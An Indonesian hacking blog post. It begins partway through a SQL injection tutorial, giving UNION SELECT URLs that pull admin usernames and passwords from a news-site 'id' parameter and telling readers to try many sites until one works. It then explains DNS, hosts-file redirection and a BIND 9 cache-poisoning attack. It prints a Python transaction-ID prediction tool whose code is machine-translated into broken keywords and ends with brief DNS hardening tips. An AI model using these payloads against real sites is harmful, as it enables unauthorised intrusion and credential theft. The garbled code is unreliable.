memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara 

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi 
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir 

Code: 
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)-- 

contoh kata yang keluar adalah id,username,password 

Code: 
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,usernam e,password),6,7,8+from+admin-- 

Catatan: Mencari target tidaklah mudah, dan tidak semuanya web memiliki bug dan kelemahan sesuai yang ada dalam pikiran anda, bisa jadi anda melakukan teknik ini pada lebih dari 10 web dan hanya satu yang berhasil, jadi intinya harus sabar salam melakukannya.

DNS Hacking

1. Apa itu DNS?

Sebuah DNS adalah server yang menerjemahkan nama domain menjadi alamat IP. Setiap situs memiliki IP atau set nomor alamat IP-. World wide web dan komputer di semua pekerjaan lebih mudah dengan angka, di sisi lain kita sebagai manusia merasa sulit untuk mengingat alamat web sebagai kelompok angka. Misalnya Google.com situs memiliki alamat sendiri di nomor (alamat IP): http://64.233.167.104/

Jadi jika Anda mengetik alamat di atas, browser Anda tidak akan terhubung ke server DNS hanya karena alamat web yang disebutkan sebenarnya satu set nomor dan komputer tidak perlu "terjemahan". Itu de facto terjadi pada har
i-hari awal world wide web dan internet dan Fidonet (pesaing sudah lupa dari internet di awal hari (internet), Fidonet benar-benar digunakan hanya angka untuk merujuk ke alamat, itu digunakan sudah istilah " zone ", yang sangat penting untuk operasi server DNS, tetapi kita akan membahas nanti).

DNS pertama kali muncul tahun 1993, namun tahun sebelum 90-an, sekelompok mahasiswa Berkeley menciptakan BIND (Berkeley Internet Domain Name), yang saat ini server DNS yang paling populer.

Di sisi lain sejarah DNS tidak bahwa "terang" dan "jelas" seperti yang tampak. Sejak tahun BIND sangat awal dan DNS pada umumnya ... selalu target serangan hacking, seperti "pharming", "spoofing", "phishing", "pembajakan", "paradoks ulang tahun". Kami akan menyatakan teknik ini secara rinci di bawah.

Namun, mari kita memeriksa struktur DNS secara rinci baik. Dalam rangka untuk memahami dan mencegah serangan hacking kita perlu pemahaman yang sangat baik dari struktur internet sama sekali. Banyak orang tidak menyadari dalam rangka apa query DNS berlangsung. Beberapa orang mungkin akan mengejutkan bahwa permintaan DNS pada kenyataannya terjadi mulai dari atas ke bawah -> misalnya. root server -> server ISP -> server lokal -> resolver cache.

Namun seperti yang kita telah dijelaskan pada hari-hari awal Internet, DNS tidak diperlukan. Setiap komputer saat itu telah memiliki sendiri "host" file, mengejutkan file host terkenal belum ada di Linux dan Windows sistem. Perannya adalah untuk menangani beberapa website yang cukup sering digunakan. Anda dapat memodifikasi file host Anda. Pada mesin windows file host berada: c: \ windows \ system32 \ drivers \ etc \ Itu adalah kasus di Windows XP. Pada Linux Anda mungkin mencoba untuk menemukannya di / etc

Anda dapat membuka file host dengan notepad dan memodifikasinya sehingga halaman Web manapun nantinya bisa redirect ke alamat IP dari pilihan Anda. Jika Anda "mencurigakan" cukup Anda mungkin sudah menyadari buruk besar "hacking" Potensi belakang DNS. Dalam prakteknya, dengan asumsi bahwa Anda telah membuka file host Anda. Tambahkan baris ini di bagian atas file Anda. Tolong, jangan lupa untuk membuat salinan file host, untuk berjaga-jaga. Sekarang buka file host dengan notepad, pilih kode di dalamnya. Hapus kode awalnya di file host dan pada tempat kode lama paste:

# Copyright © 1993-1999 Microsoft Corp
#
# Ini adalah contoh HOSTS file yang digunakan oleh Microsoft TCP / IP untuk Windows.
#
# File ini berisi pemetaan alamat IP ke nama host. Masing-masing
# Entri harus disimpan pada garis individu. Alamat IP harus
# Ditempatkan di kolom pertama diikuti dengan nama host sesuai.
# Alamat IP dan nama host harus dipisahkan dengan setidaknya satu
# Ruang.
#
# Selain itu, komentar (seperti ini) dapat dimasukkan pada individu
# Baris atau mengikuti nama mesin dilambangkan dengan simbol '#'.
#
# Misalnya:
#
# # 102.54.94.97 rhino.acme.com server source
# 38.25.63.10 x.acme.com # x client host

127.0.0.1 localhost
64.233.167.104 yahoo.com

Sekarang buka browser web favorit Anda dan mencoba untuk menavigasi ke: http://yahoo.com

Sekarang Anda tidak melihat Yahoo, kan??? Anda mungkin bersedia untuk mencapai Yahoo tetapi Anda melihat ... Google? Cukup membingungkan, tapi apa yang baru saja Anda lakukan adalah untuk menetapkan alamat IP dari Google ke domain yahoo.com.

Tak perlu dikatakan, perubahan ini hanya bekerja pada komputer Anda ... itu tidak mencapai Yahoo atau Google secara langsung, tapi untuk hacker pemula teknik ini hanyalah contoh dari kekuatan ekstrem tersembunyi dalam eksploitasi DNS berbahaya. Tentu saja dalam rangka untuk membalikkan hack mengganggu hanya membuka file host lagi dan ... lebih baik segalanya menghapus dalamnya. Anda mungkin tidak perlu nilai localhost ditugaskan untuk 127.0.0.1, bahkan lebih baik mengganti localhost Anda ke alamat tertentu :) baik numerik seperti 1.1.1.1.

Berikut adalah diagram sederhana yang menunjukkan Anda meskipun cara pertanyaan Anda DNS di internet. Apa sebenarnya yang terjadi di latar belakang saat Anda mengetik webaddress di browser Anda. Operasi terjadi dalam satu detik, dalam pecahan fakta detik dan jelas ini tidak mengganggu Anda, karena Anda mencapai Google.com favorit Anda atau Yahoo.com secepat Anda berkedip:

Posted Image

2. DNS hacker teknik:

2.1. Pendekatan modern: Sebuah mengeksploitasi terbaru dalam BIND 9:

Banyak DNS serangan mencoba menggunakan "man di tengah" jalan. Dengan kata lain, ketika server DNS yang sebenarnya mengharapkan jawaban dari klien, perangkat lunak pihak ke-3 sengaja berbahaya "mewakili" dirinya sebagai klien nyata dan karenanya server DNS percaya bahwa ini adalah klien nyata dan berkomunikasi dengan perangkat lunak berbahaya, sedangkan buruk software meracuni server DNS cache ... keracunan cache server dengan hasil palsu seperti menetapkan alamat IP palsu ke situs seperti ebay.com. Jadi waktu berikutnya ketika pengguna mencapai server DNS dan terima kasih ebay.com terbuka untuk server DNS, itu benar-benar membuka situs diracuni dengan IP hack palsu ditugaskan ke server yang benar-benar milik hacker untuk mendapatkan informasi pribadi seperti nomor kartu kredit, rekening bank ... Di sisi lain kabar baiknya adalah bahwa serangan tersebut telah sangat berhasil dalam beberapa tahun terakhir berkat untuk patch yang dirilis oleh BIND dan lainnya DNS server. Serangan DNS menjadi kembali busana hacking di tahun 90-an bahkan mungkin lebih populer daripada trojan di beberapa titik. Tapi ... namun lubang keamanan yang buruk tidak lebih ... Sebuah baru-baru ini dan mengeksploitasi sangat menarik dalam versi terbaru dari BIND menunjukkan bahwa BIND "acak" angka sebenarnya diprediksi. Ini "angka acak" sebenarnya ID unik yang server BIND harus menetapkan pada sesi saat ketika berkomunikasi dengan klien. Hanya untuk memastikan bahwa itu benar-benar berkomunikasi dengan klien dan tidak beberapa software hacking. Kerugian lain berasal dari fakta bahwa sesi BIND hanya 16 byte kode. Bagi orang-orang yang mengerti tentang kriptografi jelas bahwa kode tersebut bisa tidak hanya rusak oleh kekerasan tapi bahkan menduga dengan logika sederhana. Pendekatan menarik seperti dijelaskan secara rinci dalam makalah di bawah ini:

http://www.securitea...5VP0L0UM0A.html

Kemudian, telah ditulis prototipe dengan Python untuk menguji manual ini. Berikut adalah kode sumber:

# / Usr! / Bin / env python

"" "
DNS Cache Poison v0.3beta oleh posedge
berdasarkan pada kertas Klein Amit: http://www.trusteer.com/docs/bind9dns.html

Output: <time>: <ip>: <port>: id: <id> q: <query> g: <good> e: <error>

id: ID untuk memprediksi
q: jumlah query dari server DNS (query hanya dengan LSB pada 0 di ID)
g: jumlah baik diprediksi ID
e: jumlah kesalahan ketika mencoba untuk memprediksi * seharusnya * diprediksi ID
"" "

import socket, pilih, sys, waktu
dari impor struct membongkar, pak
dari htons soket impor

_ANSWER_TIME_LIMIT = 1,0 # 1sec
_NAMED_CONF = [[<your_dns1_hostname>, <your_dns1_ip>], \
               [<your_dns2_hostname>, <your_dns2_ip>], \
               [<etc>, <etc>]]

Kelas BINDSimplePredict:
  def __ init__ (self, txid, bind_9_2_3___9_4_1 = True):
    self.txid = txid
    self.cand = []
    jika bind_9_2_3___9_4_1 == Benar:
      # Untuk BIND9 v9.2.3-9.4.1:
      self.tap1 = 0x80000057
      self.tap2 = 0x80000062
    lain:
      # Untuk BIND9 v9.0.0-9.2.2:
      self.tap1 = 0xc000002b # (0x80000057 >> 1) | (1 << 31)
      self.tap2 = 0xc0000061 # (0x800000c2 >> 1) | (1 << 31)
    self.next = self.run ()
    kembali

  def run (self):

    if (self.txid & 1) = 0:!
      # Print "Info: LSB tidak 0 Tidak dapat memprediksi ID transaksi berikutnya.."
      kembali False
 
    # Print "Info: LSB adalah 0, memprediksi ..."
 
    # Satu bit pergeseran (dengan asumsi LSB dua itu adalah 0 dan 0)
    untuk MSB di xrange (0, 2):
      self.cand.append (((MSB << 15) | (self.txid >> 1)) & 0xFFFF)
 
    # Dua bit pergeseran (dengan asumsi LSB dua itu adalah 1 dan 1)
    # Pertama pergeseran (kita tahu LSB adalah 1 di kedua LFSRs):
    v = self.txid
    v = (v >> 1) ^ ^ self.tap1 self.tap2
    if (v & 1) == 0:
      # Setelah shift pertama, LSB menjadi 0, sehingga dua LFSRs sekarang memiliki
      # Identik LSB ini: 0 dan 0 atau 1 dan 1
      # Kedua pergeseran:
      v1 = (v >> 1) # 0 dan 0
      v2 = (v >> 1) ^ ^ self.tap1 self.tap2 # 1 dan 1
    lain:
      # Setelah shift pertama, LSB menjadi 1, sehingga dua LFSRs sekarang memiliki
      # Berbeda LSB ini: 1 dan 0 atau 0 dan 1
      # Kedua pergeseran:
      v1 = (v >> 1) ^ self.tap1 # 1 dan 0
      v2 = (v >> 1) ^ self.tap2 # 0 dan 1
 
    # Juga perlu untuk menghitung selama 2 MSB yang kita mengerti tentang
    untuk msbits di xrange (0, 4):
      self.cand.append (((msbits << 14) | v1) & 0xFFFF)
      self.cand.append (((msbits << 14) | v2) & 0xFFFF)

    kembali Benar;
 
Kelas DNSData:
  def __ init__ (self, data):
    self.data = Data
    self.name =''

    for i in xrange (12, len (data)):
      self.name + = data [i]
      jika data [i] == '\ x00':
        istirahat
    q_type = unpack ("> H", data [i +1: i +3]) [0]
    jika q_type = 1:! # hanya jenis: A (alamat host) diperbolehkan.
      self.name = Tidak ada
    kembali

  def respon (self, ip = None):
    packet =''
    paket + = self.data [00:02] # id
    paket + = "\ X84 \ x10" # bendera
    paket + = "\ x00 \ x01" # pertanyaan
    paket + = "\ x00 \ x01" # menjawab RRS
    paket + = "\ x00 \ x00" # otoritas RRS
    paket + = "\ x00 \ x00" # tambahan RRS
    paket + = self.name # query: Nama
    paket + = "\ x00 \ x01" # query: tipe (A)
    paket + = "\ x00 \ x01" # query: class (IN)
    paket + = "\ xc0 \ x0c" # jawaban: Nama
    jika ip == Tidak ada:
      paket + = "\ x00 \ X05" # jawaban: jenis (CNAME)
      paket + = "\ x00 \ x01" # jawaban: kelas (IN)
      paket + = "\ x00 \ x00 \ x00 \ x01" # jawaban: waktu untuk hidup (1sec)
      paket + = pack ("> H", len (self.name) +2) # jawaban: panjang data
      paket + = "\ x01" + "x" + self.name # jawaban: nama utama
    lain:
      paket + = "\ x00 \ x01" # jawaban: tipe (A)
      paket + = "\ x00 \ x01" # jawaban: kelas (IN)
      paket + = "\ x00 \ x00 \ x00 \ x01" # jawaban: waktu untuk hidup (1sec)
      paket + = "\ x00 \ x04" # jawaban: panjang data
      paket + = str.join ('', peta (lambda x: '.' chr (int (x)), ip.split ())) # IP
    # Paket + = "\ x00 \ x00 \ X29 \ x10 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00" # Tambahan
    kembali paket

Kelas dnsserver:
  def __ init__ (self):
    self.is_r = []
    self.is_w = []
    self.is_e = []
    self.targets = []
    self.named_conf = []
  
    for i in xrange (len (_NAMED_CONF)):
      start = 0
      tmp =''
      untuk j di xrange (len (_NAMED_CONF [i] [0])):
        jika _NAMED_CONF [i] [0] [j] == '.':
          tmp + = chr (j - start)
          tmp + = _NAMED_CONF [i] [0] [start: j]
          start = j + 1
      tmp + = chr (j - start + 1)
      tmp + = _NAMED_CONF [i] [0] [start:] + "\ x00"
      self.named_conf.append ([tmp, _NAMED_CONF [i] [1]])
    kembali

  def run (self):
    self.s = socket.socket (socket.AF_INET, socket.SOCK_DGRAM)
    self.s.bind (('', 53))
    self.is_r.append (self.s)
    next = False
    i = 0

    sedangkan 1:
      r, w, e = select.select (self.is_r, self.is_w, self.is_e, 1.0)
      jika r:
        coba:
          data, addr = self.s.recvfrom (1024)
        kecuali socket.error:
          terus

        txid = unpack ("> H", data [00:02]) [0]
        p = DNSData (data)
        jika p.name == Tidak ada:
          terus

        ditemukan False =

        untuk j di xrange (len (self.named_conf)):
          jika p.name == self.named_conf [j] [0]:
            ditemukan Benar =
            istirahat

        jika ditemukan == Benar:
          self.s.sendto (p.response (self.named_conf [j] [1]), addr)
          terus

        # FIXME: kode yang salah, adalah 'i' 0 di mulai dan ketika 1 item dalam daftar ...
        for i in xrange (len (self.targets)):
          jika self.targets [i] [0] == addr [0]:
            istirahat
        if i == len (self.targets):
          self.targets.append ([addr [0], False, time.time (), [None, None], \
            Tidak ada, 0, 0, 0])

        jika self.targets [i] [1] == False:
          bsp = BINDSimplePredict (txid)
          self.targets [i] [1] = bsp.next
          self.targets [i] [3] [0] = bsp.cand
          bsp = BINDSimplePredict (txid, False)
          self.targets [i] [3] [1] = bsp.cand
        lain:
          jika p.name == self.targets [i] [4]:
            berlalu = time.time () - self.targets [i] [2]
            jika berlalu> _ANSWER_TIME_LIMIT:
              print 'Info: Jawaban lambat, membuang (% .2 f detik)'% berlalu
            lain:
              self.targets [i] [5] + = 1
              found_v1 = False
              found_v2 = False
              untuk j di xrange (10):
                jika self.targets [i] [3] [0] [j] == txid:
                  found_v1 = True
                  istirahat
                jika self.targets [i] [3] [1] [j] == txid:
                  found_v2 = True
                  istirahat

              jika found_v1 == Benar atau found_v2 == Benar:
                self.targets [i] [6] + = 1
              lain:
                self.targets [i] [7] + = 1

              # TODO: jika found_v1 atau found_v2 Benar, kemudian menunjukkan versi bind!
              print "\ n" + str (i) + 'target:', self.targets
              print '% f:% s:% d: id: 04x% q:% dg:% de:% d'% (time.time (), \
                addr [0], addr [1], txid, self.targets [i] [5], \
                self.targets [i] [6], self.targets [i] [7])
              self.targets [i] [1] = False
        self.targets [i] [2] = time.time ()
        self.targets [i] [4] = "\ x01" + "x" + p.name
        self.s.sendto (p.response (), addr)
    kembali

  def dekat (self):
    self.s.close ()
    kembali

jika __ name__ == '__main__':
  dns_srv = dnsserver ()

  coba:
    dns_srv.run ()
  kecuali KeyboardInterrupt:
    print 'ctrl-c, meninggalkan ...'
    dns_srv.close ()

Pada saat ini kita tidak akan membahas teknik hacking lain hanya karena ini bukan tutorial hacking dan terutama karena seperti yang telah disebutkan, sebagian besar cara DNS hacking tidak mungkin saat ini. Seperti misalnya paradoks ulang tahun. Plus Anda akan menemukan ton informasi dengan google pada topik lama seperti dan kami tidak berniat untuk menyalinnya.

Sekarang mari kita lihat apa yang dapat Anda untuk melindungi server DNS Anda.

3. Melindungi Anda server DNS

    Melindungi Anda DNS Server pencemaran sakit;
    Aktifkan rekursi hanya pada jenis tertentu dari server DNS yang Anda tahu (misalnya server DNS dari relokasi server hosting)
    Gunakan firewall. Lebih baik firewall beberapa! Penelitian terbaru menunjukkan bahwa sekitar milenium baru sekelompok hacker menembus 13 root server DNS utama dengan jumlah yang sangat tinggi dari permintaan banjir. Meskipun serangan itu bukan sesuatu yang istimewa root server berhenti berfungsi selama beberapa menit. Dalam hasil dan seluruh internet. Serangan ini tidak populer, karena cache lokal lan dns server menunjukkan halaman web setiap saat jika tidak ada yang terjadi. Bahkan jika internet tidak praktis terlihat pada pengunjung web kasual, jelas beberapa menit tanpa internet tidak bencana dunia ... Namun ini contoh yang sangat menggambarkan potensi serangan banjir, DoS disebut serangan (Denial of service) . Dan seperti yang telah disebutkan dalam contoh khusus root server yang digunakan firewall beberapa yang secara harfiah menyelamatkan mereka dari ledakan overheating dan literal / keluar dari layanan ...
    Gunakan zona internal saja;
    Hati-hati di transfer zona.
    Selalu menginstal patch terbaru dari BIND;
    Buat backup harian dan lebih baik meniru hard disk;
    Konfigurasi pihak ke-3 server lokal DNS untuk bertindak sebagai master DNS server, cara ini Anda dapat melarang akses dari internet.
    Lebih baik menggunakan Linux daripada Windows dan mungkin Fedora atau Redhat dengan SELinux diaktifkan. Instalasi patch pada sistem ini selalu merupakan ide yang baik.
    Gunakan tool seperti "Necto" untuk memindai port terbuka Anda, domain, dan sebagainya. Ikuti untuk aktivitas yang tidak biasa pada port yang lebih tinggi atau pada semua port.
    Menyebarkan server sebagai server inti.
    Hindari layanan seperti DynDNS.
    Gunakan MAC keterbatasan alamat di mana hal ini mungkin.
    Instal dan jalankan server DNS pada kontroler domain.
 source:timntonz.blogpot.com

Postingan Lebih Baru Postingan Lama Beranda